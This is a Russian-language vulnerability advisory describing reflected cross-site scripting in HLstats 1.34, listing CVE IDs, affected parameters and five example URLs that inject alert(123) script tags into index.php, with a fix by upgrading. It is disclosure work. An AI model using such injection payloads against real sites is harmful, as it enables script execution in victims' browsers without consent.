Межсайтовый скриптинг в HLstats

Дата публикации:
31.08.2006
Дата изменения:
24.03.2009
Всего просмотров:
1532
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-4454
CVE-2006-4543
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
HLstats 1.x
Уязвимые версии: HLstats 1.34, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "q" в сценарии hlstats.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]/index.php?mode=players&game=%3Cscript%3Ealert(123)%3C/script%3E
http://[host]/index.php?mode=weaponinfo&weapon=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc
http://[host]/index.php?mode=search&q=whatever&st=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc
http://[host]/index.php?mode=actioninfo&action=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc
http://[host]/index.php?mode=mapinfo&map=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc

URL производителя: www.unitedadmins.com/index.php?p=content&content=hlstats

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: XSS in HLstats 1.34

или введите имя

CAPTCHA